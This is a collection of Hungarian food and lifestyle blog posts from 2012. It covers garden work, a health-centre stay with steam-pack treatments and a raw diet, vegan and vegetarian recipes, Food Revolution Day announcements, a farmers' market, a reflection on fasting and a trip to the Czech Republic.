főztünk is jó lecsót. :) Anya dolgozott vele a legtöbbet, ő szedte, én meg locsoltam, illetve a fekete ribizli bokrot kopasztottam meg. A fokhagyma tisztítás jó macerás, mire belejöttem a fonásba, a negyedik stócnál tartottam, és el is fogyott. Valószínűleg jövőre elfelejtem, hogyan is kellett, és ugyanúgy járok. Persze ha feltételezzük, hogy lesz jó fokhagymatermés, és miért ne reménykednénk benne. Tegnap aztán fólia gazolás volt. A paprikák is megemberelték magukat. Leszedtem az érett növényeket, plusz paradicsomot és néhány uborkát is. Kellemes volt cipelni a vödröt azzal a tudattal, hogy egészséges és szép, hersegő növényekkel van tele. A szeder is érni kezdett, és lassan a mákot is lehet szedni. Hála Istennek van a kerttel munka, és eredménye is lesz a kamrapolcokon. Télen lesz mit levenni róla. :)
Eleki Egészségközpont 3. rész
2. nap napközben: Ahogy tegnap ígértem, leírom a gőzpakolásról szerzett tapasztalataimat, mielőtt a gőzpakolásra elindulok. Tehát egy masszázságyra feküdtem, csak éppen nem masszázs várt rám. A felső testet kellett szabaddá tenni a ruháktól. Ezt követően kezelőm 2 vagy 3 törölközőt félbehajtva a hátamra helyezett. A törölközők egymáson feküdtek, tehát 4-6 réteg törölközőre rakta rá a felforrósított textilköteget. Majd egy nagy lepedővel letakarta a testemet, végül egy takaróval is úgy, hogy a lábfejem kinn volt a ,,dunsztból. Ha jól emlékszem, 3 percig engedte, hogy átmelegítse nem csak a derekamat, a gerincem környékét, hanem az egész testemet ez a gőzpakolás. Ezt követően hideg vizes kisebb törölközővel áttörölte a felmelegített hátamat, majd újból megismételte a gőzpakolást. Ez - ha nem tévedek - öt alkalommal ismétlődött meg. Nagyjából egy órát vett igénybe. Annyira ellazultak az izmaim, hogy olykor-olykor be is aludtam a kezelés alatt. Aztán felébredtem a hideg dörzsire. 1. kép: A szövetek, textíliák ebben a fém "dobozban" forrósodnak fel. 2. kép: A fém "doboz kívülről látható, a forróság a vezetéken keresztül érkezik. 3. kép: Többszöri nyitogatást követően a kb. 50 C fokos meleg már "csak" 44 C fokot mutat. 4. kép: A törölközők, amik tetejére a forró szövetet helyezik. Az érdekessége, hogy a gőzpakoláshoz szükséges forró textíliák egy vastag falu fém ,,ládában kerülnek felforrósításra. (Ld:képek.) Ilyen kezelést nem csak én kaptam. De szobatársam teljesen más kezelési móddal kerül gyógyításra. Neki az arcüregét kellett tegnap gőzölnie, ma pedig forró és hideg vizes váltakozással kap ,,arcfürdőt, amihez valami búvárpipa (?) is jár, a víz és a nyelőcső találkozásának megelőzésére. 3-5 perc körül a meleg vízben, max. fél percig pedig a hideg vízbe kell az arcát tennie. Érdekes. Számomra az. Ami a mai kaját illeti... Reggeli ébredésemről beszámoltam, az alapján, hogy kevésbé voltam éhes. A reggeli áhítat után kezelőm készített nekem egy zöld ,,löttyöt. Préselt petrezselyemlevél, 1 dl paradicsomlé és zöld alga por került kikeverésre. Sós íze volt, enyhén paradicsomos és petrezselymes. Mivel fél pohár sem volt, túlélve megittam kortyolgatva. Aztán idővel jött a reggeli. A fotón látható. Az ebéd pedig, nem sokkal különbözött a reggelitől, de azért arról is mutatok fényképet. Sajnos egy nagyobb része erősen citromos volt, így nem is ettem meg mindet, de a cukkini nyersen is finom volt. A reggelim: cukkiniszeletek, jégsalátalevelek. Az ebéd előétele: reszelt cukkini fokhagyma és só ízesítéssel. Ez a főfogás: saláta, ruccola, cukkini, paprika, lilahagyma. Csinos volt, csak nagyon citromos. :( A salátához "köret" is járt: zellerszár. Nem tudom, vicces, vagy elgondolkodtató, vagy mindkettő? Másfél órája elfogyasztottam. Éhes vagyok-e? Az igazság az, hogy egyikkel sem laktam túl jól. Éhes csak olyan szinten vagyok, hogy vágyom a ,,normális kajára. Egy jó kis borsófőzelék, na az tuti jól esne. A gyomrom nem kíván semmit különösebben. Ez utóbbit is csak a megszokás mondatja velem, hiszen egy hétköznapi ember jellemzően nem így táplálkozik, még ha úton is van a vegán táplálkozás felé. Szóval ez nyers koszt. Ami a folyadékbevitelemet illeti... Tegnap kibírtam tea nélkül (nem kötelező), vizet ittam. Peridotot (lúgos víz, éhgyomorra kifejezetten ajánlott) és tisztított helyi vizet. Mint a legelső bejegyzés elején a települést bemutattam, Gyula itt van a szomszéd helység. Nos a víz, képzelhetitek... Hiába tisztított víz (valami ozmózisos, ami be van építve a mosogató mellé), ugyanis az íze és a bukéja egy az egyben olyan, mintha a gyulai fürdőben lubickolnék. Ezek után már persze reggel nem bírtam más vizet inni. Szobatársamtól kaptam egy pohár hideg peridotot - éhgyomorra jól jött, de elmentem az egyik boltba venni magyar ásványvizet - olyat, aminek alig van íze. Azt iszogatom, szigorúan betartva az egészséges ivás szabályát: étkezés után bő egy órával iszom először. Így nem zavarja meg a gyomrot az emésztésben a folyadék. Ezt annak is ajánlom, aki nem böjtöl, nem diétázik, stb. Ellenben örülhetek, mert ma már táplálékhoz jutottam. Viszont van olyan vendég, akinek a böjtje ma indult el, így nem ehetett velünk. Már csak annyit akartam írni, hogy külön diétája van a pajzsmirigy, cukor, rákos, stb. betegséggel küzdő embereknek. Ez alapján nem mindenkinek egyforma az étel, amit reggel-délben- este elfogyaszt. Én ma nem vacsorázok - ez a rendelet. Most készülök a gőzpakolásra, aztán ha lesz időm, még élessé teszem ma a bejegyzésemet. Lett időm...:)
töltött gömbcukkini
2012. június 25. Vegasztrománia
akik ismernek, azoknak nem kell magyaráznom, hogy mit éreztem akkor, amikor szombaton, a hunyadi téri piacon, a kedvenc standomon megláttam ezeket a gyönyörű gömbcukkiniket. lehet rám vetni a köveket, mert abban a pillanatban ezerszer fontosabb volt a forma, mint a tartalom. a következőben viszont már kezemben, majd kosaramban voltak, este pedig bebizonyosodott, hogy finomak és zsengék. a recept nyilván elkészíthető a hagyományos, hosszúkás alakú cukkiniből is. sőt, nekem volt itthon 2 kis fejű karalábém, azokat is megtöltöttem, és az a friss karalábé-íz remekül kiegészítette a cukkini alakját. töltött gömbcukkini hozzávalók (4 személyre - 8 cukkinihez) 8 cukkini (vagy karalábé) 150 ml gersli 250 ml víz 1 sárgarépa 1 kis fej karalábé 6-7 szem dió apróra vágva aszalt paradicsom maradék lecsó petrezselyem (és/vagy bármilyen zöldfűszer) fokhagyma olívaolaj só, bors kevés sajt / durvára darált kenyérmorzsa a sütőt előmelegítettem 180 °C-ra (4-es fokozat). a gerslit egy kicsit megpirítottam az olívaolajon, majd felöntöttem a vízzel (mivel a sütőben sütés közben még puhul, nem kell rendesen megfőzni), megsóztam, közben hozzáadtam a kis darabokra vágott répát és karalábét, és megfőztem. a cukkiniknek levágtam egy kicsit az aljából, hogy rendesen álljanak, valamint a kalapjukat, aztán egy kiskanállal kivájtam a belsejüket. ezt apróra vágtam és az aszalt paradicsommal, a dióval, egy kis lecsóval, az apróra vágott fokhagymával és a petrezselyemmel együtt a gerslihez kevertem, borssal ízesítettem. megtöltöttem a cukkiniket, és egy sütőpapírral bélelt tálba tettem a kalapjukkal együtt, megszórtam reszelt sajttal (vegán, vagy hangulati opció a kenyérmorzsa), majd kb 25-30 perc alatt megsütöttem őket. ízkiegészítőként sárga és piros paradicsomból salsát készítettem. a paradicsomokat apróra vágtam, citrommal és apróra vágott zöld chilivel, petrezselyemmel ízesítettem.
Mogyorós - vaníliás keksztorta
Nemrégiben találtam az archívumban ezt a tortát, ami még 2 évvel ezelőtt készült és jelent meg aztán a Délmagyarország hétvégi gasztromellékletében.:-) Sütés nélkül készül, nagyon finom, és igen gyorsan elfogyott!:-) És most felteszem ide is, hálám jeléül minden kedves olvasómnak, aki rendületlenül érdeklődik privátban, mikor folytatom a blogot...:-) Gondolattal irányított blogírás nincs még?:-)) Mert akkor nagyon gyorsan haladnék ám!:-)))) Mogyorós - vaníliás keksztorta Hozzávalók (egy 22 cm-es kapcsos tortaformához): A kekszalaphoz: 300 g vegán (tej- és tojásmentes) keksz (pl. DM-ben a Digestive keksz) 3 ek. karobpor vagy 4 ek. kakaó 100 g növényi margarin/ kókuszzsír 4 ek. agave szirup (esetleg méz) egy marék mogyoró A vegán cukrászkrémhez: 30 g rizsliszt 15 g kukoricakeményítő 500 ml növényi tej (a legjobb a vaníliás szójatej) 30 g növényi margarin egy csipet őrölt vanília egy csipet kurkuma 1 bio (kezeletlen) citrom héja 2 ek. nádcukor egy csipet só Először a krémet készítsük el. Egy kis lábasban felolvasztjuk a növényi zsiradékot, majd beleszórjuk a lisztet és a keményítőt, kis növényi tejjel felöntve. Lehúzzuk a tűzről, és habverővel kavargatjuk, hogy ne csomósodjon. Hozzáadjuk a maradék tejet, a csíkokra vágott citromhéjat, a vaníliát, és egy csipet sót. Folyamatos keverés közben felforraljuk, és kb. 5 percig főzzük közepes lángon, hogy besűrűsödjön. Kihűtés előtt a citromhéj darabokat kivesszük a krémből, majd fóliával letakarva, hagyjuk kihűlni. Egy konyhai aprítógép segítségével morzsásra aprítjuk a kekszet a mogyoróval. Beletesszük a karobport, a felolvasztott margarint/ kókuszzsírt, és az agave szirupot. Az így kapott masszát belesimítjuk a tortaforma aljába (ha nem áll össze kellően a kekszalap, adhatunk még hozzá egy kis növényi tejet), és rásimítjuk a kihűlt krémet. Díszítésnek megszórhatjuk a tetejét aprított (esetleg pirított) mogyoróval. Tipp: amennyiben vaníliás szójatejjel készítjük a krémet, figyeljünk rá, hogy az karakteresen édesített. A krémet ehhez igazodva édesítsük!
Bérszakácsot keresünk
Magyarországon ez a dolog valahogy nem ismert, de előfordul azért, hogy hasznos bartel üzletek köttetnek néha. :) Ha jól emlékszem, talán Katanyaka is főzött valakinek egy időben. Pont a múltkor mondtam, hogy két emberre főzni akkora pocséklás, mert otthon 10-re majdnem ugyanannyi energia, csak több hozzávaló kell. Most viszont az a lényeg, hogy valaki megkeresett amiatt, hogy szüksége lenne egy olyan személyre, aki egészséges ételeket tud készíteni egészséges alapanyagokból, és vállalja, hogy neki főzne huzamosabb ideig, természetesen ellenszolgáltatásért. Budapesti az illető, nincsenek magas elvárásai, csak ne legyen minden nap gombapörkölt. :) Bár nagy kihívás, lehet, hogy én is szívesen csinálnám, de Pest, Mátraháza és Nagyút között random ingázva felelőtlenség lenne bármit is bevállalnom. Kérlek benneteket, hogyha valaki indíttatást érez, keressen meg, megadom az illető elérhetőségét, és megbeszélik, hogy valóban mehet-e a dolog. Köszi Lányok! (Bocs, ha valamelyik férfikolléga is érintettnek érzi magát, szó se róla, hogy kizárnám a lehetőséget. :) ) Ha már így kép nélkül maradt ez a post, mutogatok párat a kertből. A jázminbokron volt a többiek között egy ágon, az illata ugyanaz, valami különlegesebb fajta lehet. Ilyenkor nagyon szép tud lenni a trombitavirág, csak ne akarná átvenni az uralmat a kert felett. A kedvenc virágom. Mátraházán még most virágzik. Ez nem a kertből való, viszont gyönyörű.
Konyhaművészet otthon - mit, hogyan, miért?
Előadás-ajánló a pünkösd utáni keddre (holnapra).Nyári szünet előtt utoljára hallgathatunk tényeket és oszlathatunk el tévhiteket az egészségünkkel, annak megőrzésével és elősegítésével kapcsolatban.Ha bölcsebb akarsz lenni, ha tenni akarsz az egészségedért, ha érdekel az egészséges főzés tudománya, ha kérdésed van az ételkészítésekkel kapcsolatban, ha szeretnél olyan irodalmakkal (könyvek, újságok, CD-k) megismerkedni, amelyek az egészséges életmóddal kapcsolatosak, ha szívesen kipróbálnál néhány egészséges ételkülönlegességet (pl: csíra, gabonakolbász, magőrlemény mix, stb.), akkor ott a helyed az előadáson! Május 29. Konyhaművészet otthon - mit, hogyan, miért? A főzés, párolás, pirítás, olajban és roston sütés, grillezés, mikrohullámú kezelés, hűtés, mélyhűtés, szárítás és egyéb műveletek jellemzése egészségvédelmi szempontból NEM TITOK AZ EGÉSZSÉG - 2012/1. Az előadásokat kéthetente keddenként , 18 órai kezdettel, SOTE Testnevelési és Sporttudományi Kar (TF) dísztermében tartjuk (1123 Budapest, Alkotás u. 44.) Március 20. A házi gyógymódok alkalmazásának alapelvei és gyakorlata Betegségmegelőzés és gyógyítás egyszerű, hatékony eszközökkel és terápiákkal (angol nyelvű előadás, magyar tolmáccsal) Április 3. Ha az epe bajban van Az epe működésének alapjai, összetétele, az epekőbetegség háttere és étrendi kezelése. Természetes epevédelem, a kímélő étrend szabályai Április 17. A gyógyszeripar árnyoldalai - egy volt orvoslátogató szemével. Hírek és titkok a kulisszák mögül. Betegek a ,,futószalagon Május 15. A gyógyító napfény Újabb tudományos eredmények a napfény előnyös hatásairól. A napfényterápia alapjai Május 29. Konyhaművészet otthon - mit, hogyan, miért? A főzés, párolás, pirítás, olajban és roston sütés, grillezés, mikrohullámú kezelés, hűtés, mélyhűtés, szárítás és egyéb műveletek jellemzése egészségvédelmi szempontból Előadók: Tóth Gábor okl. élelmiszer-ipari mérnök, Szabó Attila tanár, egészségnevelő, dr. Wynn Horstley orvos, USA, dr. Lukács Tamás orvos Mindenkit szeretettel várunk! Az előadások után beszélgetést tartunk o Terembérleti hozzájárulásként 250 Ft-ot elfogadunk További információk: 06/30-221-9355 (Pásztor Katalin) A sorozatot szervezi és támogatja: Oltalom Alapítvány, Életpont Nonprofit Kft., Új Életmód egészségmagazin www.eletadotv.hu o www.ujeletmod.hu o www.sola.hu
Szimpla Vásárnap - őstermelői piac a Szimplakertben
Jó hír a belvárosiaknak! A Szimpla Kert, az Agri Kulti PJT., az Azért7 Egyesület, az ELTE Humánökológia Tanszék és őstermelőket tömörítő hálózatok összefogásával június 10-én őstermelői piac nyílik a Szimpla Kertben, amely heti rendszerességgel, minden vasárnap délelőtt fog üzemelni. A szervezők célja, hogy a belvárosi lakók rendszeresen friss, kifogástalan minőségű hazai élelmiszerhez juthassanak, amely így közvetlenül a termelőktől kerülhet a családok asztalára. A kezdeményezés egyúttal piacot igyekszik teremteni egy súlyosan veszélyeztetett népcsoportnak, a kihalás szélére sodort magyarországi őstermelőnek, akik részvétele mellett minőségi élelmiszereket előállító családi vállalkozásokat is várnak. A jelentkezők előzetes regisztrációt és szakmai minősítést követően kerülhetnek be az árusok közé. A piacon feldolgozott és feldolgozatlan termékek széles skálája kerül terítékre: sonkák, kolbászok, házi sajtok, lekvárok, szörpök, sőt házi készítésű kozmetikumok mellett természetesen idénygyümölcsök és zöldségek is lesznek a kínálatban. A vásárlás személyes élménye mellett szakmai beszélgetésekkel, termelők és tájegységek bemutatásával, villásreggelivel, utcazenével és gyermekprogramokkal várják az érdeklődőket, valamint alternatív élelmiszerközösségek és hálózatok is lehetőséget kapnak a bemutatkozásra hétről hétre. A piac a nyári szezonban a Szimpla Kertben működik, ám a tervek szerint ősztől kikerül a romkocsma falai közül, és kézműves dizájn termékekkel kiegészülve a Kazinczy utcában kap helyet. Háttér: A Szimpla Kertben a vásározás már hagyomány. Minden hónap második szombatján Bringás Bolhapiac, minden hónap utolsó szombatján pedig Szimpla Divat - kreatív turkáló működik a szórakozóhely falai között, valamint a Gouba dizájnpiac is többször ellátogatott már a Kertbe. Eddig az őstermelői piac a Szimpla Divattal egy időben, havonta egy alkalommal várta a látogatókat. A rendezvény sikere alapján a szervezők úgy ítélték meg, hogy a termelői piacokban szűkölködő belvárosban fontos lehet a lakóknak, hogy rendszeresen juthassanak hiteles, minőségi élelmiszerekhez, ehhez pedig egy heti rendszerességű piacra van szükség. Helyszín: Szimpla Kert, VII. kerület, Kazinczy u. 14. Időpont: június 10-étől minden vasárnap 9-14 Az esemény Facebook oldala: http://www.facebook.com/SzimplaPiac További információ: Mihály Edina edina@szimpla.hu +36.20.2618669 Forrás: innen.
Eper, méz, gyönyörűség
2012. május 22. Főzés nélkül finoman!
Az útmentén egyre több helyen találkozni már az eper kapható, hazai eper, magyar eper táblákkal, ami csalhatatlan jele annak, hogy indul az eper szezon. Ilyenkor érdemes feltölteni a fagyasztóládákat eperrel, és napi szinten élvezni a mennyei gyümölcs nyújtotta élvezeteket. Ehhez adnék egy kis segítséget a következő recepttel... Epret kevés tisztított vízzel, mézzel, nyers mogyoróval (4 személynek: 1/2 kg eper, 5 dkg mogyoró, egy evőkanál méz, 2 dl tisztított víz) pépesítettem kedvenc gépemmel, majd tálkába öntöttem, határozott körkörös mozdulatokkal mézet csurgattam a krémre és megszórtam mandulával. Az egész mehet a mélyhűtőbe 15 percre. Hmm... nagyon finom lett, gyönyörűséges! Javed
Food revolution day
Bővebb információkat a honlapon találhattok erről az indítványról. Jamie Oliver alapítványának kezdeményezésére indult az esemény, amelynek célja a táplálkozással kialakult betegségek megelőzésével kapcsolatos ismeretterjesztés. Az ország több területén sokféle esemény foglalkozik majd azzal, hogy a helyes ételválasztással, étkezéssel kapcsolatos információk eljussanak az emberekhez. Megpróbálja népszerűsíteni azt az elvet, hogy feldolgozatlan, helyi forrásból származó termékeket vásároljunk, és a fiatal generáció újra felfedezze a főzés örömét. Nagyon örülök a kezdeményezésnek, csak kár, hogy szombatra esik, viszont a születésnapomra is. Együtt leszünk elég sokan aznap, jön a zenekar is. Azt hiszem meglepem őket valami egészségessel és finommal. :)
Gombás-tofus rizottó
"Ha egy évre tervezel, vess rizst;ha egy évtizedre, ültess fákat;ha pedig egy életre, akkor tanítsd az embereket"(Régi kínai közmondás) A rizs a világon a legrégebbi idők óta termesztett gabonaféle, amit több száz országban ültetnek. A világ gabonatermésének 30%-át a rizs adja. A világ rizstermesztésének mintegy fele olyan földekről származik, amelyeket teljes egészében kézi erővel művelnek meg. Az ázsiai hagyományos művelés során az asszonyok ültetik és gyomlálják a rizst, a férfiak pedig a talaj-előkészítést és az elárasztással kapcsolatos munkákat végzik.A rizs valószínű Kínából származik, bár Koreában is a legősibb termények közé számít. Magyarország területén a rizst a 18. század végén kezdték termeszteni.A barna, fényezetlen rizs fogyasztásáról a 19. században kezdtek áttérni - különösen Ázsiában - a fényezett rizsre, amelyről a vitaminokat és fehérjéket tartalmazó terméshéjat eltávolítják. Ezeknek a tápanyagoknak a hiánya a beriberi nevű betegség gyakoriságának növekedését okozta. A beriberi szingaléz nyelven annyit tesz: "nem tudom, nem tudom", és a tiamin (B1 vitamin) és más vitaminok, valamint ásványi anyagok hiánya következtében fellépő bénító hatásra utal. Tünetei egyebek között letargia és kimerültség. A beriberi vagy másnéven kakke, gyakori betegség Ázsiában.A fenti ismertető után következzen egy barna rizsből készült olasz étel - egy rizottó gombával és tofuval ízesítve.A recept: Hozzávalók: - 20 dkg barna rizs - 20 dkg csiperke gomba - 20 dkg laska gomba - 20 dkg füstölt tofu - 1 fej hagyma - 4 szál újhagyma - 2 nagyobb darab színesebb paprika aprítva (nekem a fagyasztóból került elő) - 1 zöldségleves kocka - 1-1,5 dl víz - ételízesítő Elkészítés:A rizst, miután alaposan megmostuk, bő vízben a leveskockával nem túl puhára megfőzzük. Az a jó, ha pergősre sikerül a rizs, és nem fő szét, hanem szép különálló szemek lesznek. Amíg a rizs fő, elkészítjük a többi hozzávalót. A gombákat megpucoljuk, alaposan megmossuk. Felszeleteljük. A hagymát megfosztjuk héjától és felaprítjuk. Fogunk egy edényt és feltesszük a hagymát. Én teflon bevonatú edényt használok, így nem kell hozzá sem olaj, sem kókuszzsír, sem víz, egyszerűen csak elkezdem pirítani a hagymát. Ha nem teflon bevonatú, akkor szükség lehet olajra vagy pároláshoz (egészségesebb) vízre.A sárgára pirult hagymához hozzáadjuk a gombaszeleteket, átforgatjuk és tovább pároljuk. Ha minden jól megy, a gomba ereszt levet. Kb. 1 csapzott evőkanál ételízesítőt szórunk gombákra. Miközben párolódnak, felszeleteljük a tofut. Amikor már láthatóan megpuhultak a gombák, hozzáadjuk a tofukockákat (vagy tofucsíkokat), valamint a felaprított újhagymákat és paprikákat. Átkeverjük. 1 dl vízzel felöntjük. A lényeg, hogy ne legyen nagyon szószos, pörköltes állaga. Közepes lángon megvárjuk, míg rottyan egyet. Majd a pergős rizsszemekkel összekeverjük.Friss újhagymát és retket raktam a tányérra hozzá, de ha lett volna itthon ecetes vagy kovászos uborka, minden bizonnyal azzal is kipróbálom.A rizs főzési idejét leszámítva ismét egy gyorsan elkészíthető étellel állunk szembe. Aki fehér rizst, sőt gyorsrizst használ, annak minden bizonnyal belefér a 30 perces készítési időbe. A barna rizzsel ez kb. 15-20 perccel tovább tart, de megéri. Jázminrizzsel és vadrizzsel is nagyon finom.
2012 május 19: Food Revolution Day!
2012. május 2. Gitta nyersétel blogja
Ismerd meg és csatlakozz te is! A Food Revolution Day mozgalmat a Jamie Oliver Foundation hozta létre azzal a céllal, hogy felhívja az emberek és iskolák figyelmét arra, hogy a feldolgozott, cukros ételek mennyire károsak (elhízást, cukorbetegséget, depressziót okoznak s ez mekkora problémát jelent ma a társadalmakban). Arra szeretnének biztatni mindenkit, hogy mesterséges gyorskaják és finomított élelmiszerek helyett válasszák inkább a sokkal egészségesebb és finomabb, lehetőleg helyi alapanyagokból készített ételeket, élelmiszereket. Ezzel kapcsolatosan egy petíciót indítottak útnak, amit jelenleg közel 800.000 ember írt alá a világ minden tájáról: PETÍCIÓ Jelenleg 24 országban, 156 városban 77 nagyobb rendezvény és 155 vacsora-party kerül megrendezésre a május 19-i Food Revolution Napon. http://www.foodrevolutionday.com/ A vacsora-patry-k a családnak és a baráti köröknek szóló programok, amelyeken csak feldolgozatlan, lehetőleg helyi alapanyagokból készülhetnek az ételek - míg a rendezvények nagyobb, dietetikusok,orvosok, éttermek,iskolák és sportközpontok által szervezett ingyenes, ismeretterjesztő és figyelemfelkeltő programok. A Nyersétel Akadémia folyamatosan Food Revolution Day-t tart, hiszen minden nap készíti a helyi alapanyagokból a feldolgozatlan, élő, nyers ételeket! Budapest és Szeged területén mindenki számára elérhető az egészséges, élő ebéd! Május 19-én kóstoltatással egybekötött bemutatót tartunk a Szűcs Sándor Általános iskolában Újpesten, egy egészségnap keretében. Itt a gyerekek és a szüleik is megismerhetik, hogy milyen egyszerűen és milyen finom ételeket lehet készíteni zöldségekből, gyümölcsökből feldolgozás, főzés és sütés nélkül. Május 5-én ingyenes nyílt napot tartunk a Nyersétel Akadémián, ezzel is hozzájárulva a Food Revolution Day célkitűzéséhez: minél több ember ismerje meg az egészséges táplálkozás alapjait, és mikéntjét. Tanácsadással, alapanyagokkal, kész termékekkel próbáljuk segíteni az embereket az egészséghez vezető úton. Csatlakozz Te is a magyar Food Revolution aktivistákhoz! Álljunk ki közösen az egészséges, valódi ételek mellett! A programokhoz szükséges letölthető anyagokat megtalálod - ITT -. Hívjátok meg a barátaitokat, készítsetek fotókat az ételekről, a hangulatról, a programokról és a készülődésről! Legyen Május 19-e egy egészséges, aktív nap a valódi ételek jegyében!
Food Revolution Day - Május 19-én
Május 19-én csatlakozz Te is a Food Revolution Day-hez! Egy vacsoracsatával, piknikkel vagy egy nagyobb rendezvénnyel akár! www.foodrevolutionday.com Szeretnénk felhívni a magyar emberek és magyar iskolák figyelmét is arra, hogy a feldolgozott, cukros ételek mennyire károsak,s hogy mesterséges gyorskaják és finomított élelmiszerek helyett mennyivel egészségesebbek és finomabbak a minőségi alapanyagokból készített ételek. Válaszd az igazit, válaszd a helyit! Csatlakozz Te is a magyar Food Revolution aktivistákhoz! Álljunk ki közösen az egészséges, valódi ételek mellett! Május 19-én szeretnénk Budapestet (és más magyar városokat) is a Food Revolution Day térképére tenni rendezvényekkel, vacsora partykkal, közös piknikekkel. Mindezt a tudatos táplálkozás jegyében! Szervezhetsz akár kisebb akár nagyobb rendezvényeket: A programokhoz szükséges letölthető anyagokat itt találod. Hívjátok meg a barátaitokat, készítsetek fotókat az ételekről, a hangulatról, a programokról és a készülődésről! Törjük a fejünket közösen, miként tudnánk ezt a napot emlékezetessé tenni! Mindezt közösen, örömmel és önkéntesen! Legyen Május 19-e egy egészséges, aktív nap a valódi ételek jegyében! Egy Food Revolution Nap! Mi is készülünk egy forradalmi programmal! Részletek hamarosan!
hála
az az érzésem, egyre kevésbé szól ez a böjt a testi tisztulásól. eleinte főleg a testi változásokra voltam kíváncsi, figyeltem, mikor történik már valami érdemleges változás. logikusan átgondoltam és tudományosan megmagyaráztam, megterveztem az egész folyamatot, de igazából azóta is inkább olyasféléket tapasztalok, amiket ha nem figyel nagyon az ember, valószínű nem vesz észre. (persze nem árt nagyon figyelni, mert ezek azért jelentős változások.) de materiális csodák nélkül is végtelenül hálás vagyok ezért a böjtért. olyan dolgokat látok most tisztán, és legfőképpen élek meg pozitívan, amik régóta zavarják az egyensúlyom. mindez nem történt volna meg egy hét alatt, és nem tanultam volna valódi jelenlétet és türelmet sem. a hosszú távú böjt ötlete már az elején részben azért fogott meg, mert ez a periódus elég hosszú ahhoz, hogy az ember valóban elengedje a dolgait. eleinte olyan beláthatatlannak tűnt, hogy nem tudtam volna úgy belefogni, hogy számolom a napokat. szörnyű lett volna, ha nem csak az a nap, az a pillanat létezik, ami éppen van. és most egyensúlyban érzem magam, pontosan a középpontban. sosem láttam még ilyen világosan a céljaimat, önmagamat, a szabadságomat és felelősségemet, és nem éreztem még ilyen örömöt és erőt, hogy egyedül járom a saját utam, hogy nincs szükségem senkire és semmire. ezek mind olyan dolgok, amiket régóta tudok, mégsem éltem meg teljesen. és azt hiszem, éppen ez elől az erő elől menekültem. ez olyasmi, amit nem szeret az egó. persze hogy nem, mert értelmét veszti benne, megsemmisül. a szabadság, amire mindig vágytam, amiért mindig küzdöttem: ugyanaz ami elől menekültem. a böjtnek nemsokára vége, és várom a kihívást, hogyan fogom használni az alatta megtapasztalt türelmet és hozzáállást. hogyan fogok élesben reagálni a megszokott játszmákra, hogyan fogok változtatni a programon.
tönköly saláta sült zöldségekkel
2012. április 2. Vegasztrománia
azt eddig is tudtam, hogy a tönkölybúza egészséges, de azt nem, hogy nemcsak a csíráját, "füvét" és lisztjét tudom felhasználni, hanem a búzaszemeket is. carlo hívta fel rá a figyelmemet, akivel olasz (toszkán) ételekről, étkezési szokásokról beszélgettem. ők sokat használják és farro-nak hívják. nagyon kíváncsivá tett, és miután jamie olasz szakácskönyvében találtam hozzá egy zseniális receptet, a hétvégén kétszer is elkészült. a reneszánszát élő tönkölybúzát magyarországon dr kalmár gergely és dr kajdi ferenc kitartó munkájának köszönhetően fogyaszthatjuk, akik "kifejlesztették" az öko-10 jelölésű tönkölybúzát. nem hisztis, jól alkalmazkodik a környezeti adottságokhoz. genetikailag tiszta, ezért ellenálló a kártevőkkel és a betegségekkel szemben. a b12 vitamin kivételével az összes b vitamin megtalálható benne, ezen kívül jelentős az e-vitamin-, kalcium-, magnézium-, foszfor-, és szeléntartalma. (forrás: vitaminsziget) tönköly saláta sült zöldségekkel hozzávalók (főételnek 4 személyre, előételnek 8 személyre) 200 g tönkölybúza (bioboltokban, ázsia boltban kapható) 1 cukkini 1 édesköménygumó 1 vöröshagyma 1 kápia paprika 1 sárga kaliforniai paprika (vagy sárga cukkini - a lényeg a szín) 1 padlizsán 1 szárzeller 3-4 gerezd fokhagyma olívaolaj só, bors zöld fűszerek (petrezselyem, bazsalikom, oregánó, menta, kakukkfű, medvehagyma) finomra aprítva 1/2 citrom leve a sütőt előmelegítettem 200 °C-ra (6-os fokozat). a tönkölyt 20 percig hideg vízbe áztattam, majd leszűrtem. átpirítottam egy kevés olajon, majd kétszeres vízben megfőztem (rágós lesz, de nagyszerűen kiegészíti a sült zöldségek puhasága). a fokhagyma kivételével (azt egészben hagytam) egyforma méretűre vágtam a zöldségeket (kb 1cm x 1 cm kockákra), beleszórtam őket egy sütőpapírral bélelt tepsibe, sóztam, borsoztam, nyakon öntöttem olívaolajjal (ne sajnáljuk!) és összekevertem. 15-20 perc alatt, néhányszor átkeverve megsütöttem őket (figyeljük a sütőnket, lehet, h több időre lesz szükség). egy nagy tálban összekevertem a tönkölyt, a zöldségeket, az apróra vágott sült fokhagymát. a zöld fűszereket, citromot facsartam rá és kész. langyosan a legfinomabb.
Hétvégi ízmorzsák Csehországból
2012. március 20. Zizi kalandjai
Most kevesebb lesz az ízmorzsa és több az utazás, ugyanis az elmúlt hosszú hétvégét Csehországban töltöttük. Szétnéztünk Prágában, Český Krumlovban és Mariánské Lázněban. Csehország nem vega barát konyhájáról ismert, így kiemelkedő gasztronómiai élményben - a sörön kívül - nem volt részünk, viszont a látnivalók kárpótoltak. Íme a cseh fotó csokrom nektek... Károly híd Csillagászati óra az Óváros téren Óvárosi tér Týn templom az Óvárosi téren esti kivilágításban Kézműves cukorka készítés Cseh csokoládék, bonbonok Hangulatos házikó a belvárosban U Kalicha söröző, amelyet Jaroslav Hašek - Švejk, a derék katona c. regénye tett világhírűvé. Tipikus söröző, cseh konyhával, napközben nem túl forgalmas, azonban estére ajánlatos előre helyet foglalni. Van magyar nyelvű étlap is. (Prága 2. kerület, Na Bojisti 12-14.) Károly híd és a Moldva folyó A híres táncoló ház vagy más néven Ginger & Fred épület Várakozó család a prágai főpályaudvaron (Praha Hlavní Nádraží) Meseszép Český Krumlov Český Krumlov Dél-Csehországban, a Moldva folyó kettős kanyarulatának partján fekszik.Történelmi negyedét, amit a Moldva nagy kanyarja szinte teljesen körülölel, az UNESCO 1992. december 13-án a Világörökség részének nyilvánította. A várba nincs belépő!!! Nagyon érdemes felsétálni a kilátás miatt! Csehország autója: Škoda Csehország egyik jelképe a Kisvakond, Krtek Cseh reggeli Mariánské Lázně, fürdőváros egyik parkja. Gyógyforrásait már a 18. században ismerték. Az 1805-ben alapított fürdőhely 1812-ben vette fel a Mariánské Lázně helységnevet, egyik gyógyforrása nevének alapján, majd pedig 1818-ban hivatalosan is gyógyfürdőhellyé nyilvánították, melynek következtében fejlődése jelentős mértékben felgyorsult. Mariánské Lázně, árkádok Tavasz Csehországban
Tavaszi tekercs /Raw Spring Rolls/
2012. március 13. Nyers konyha
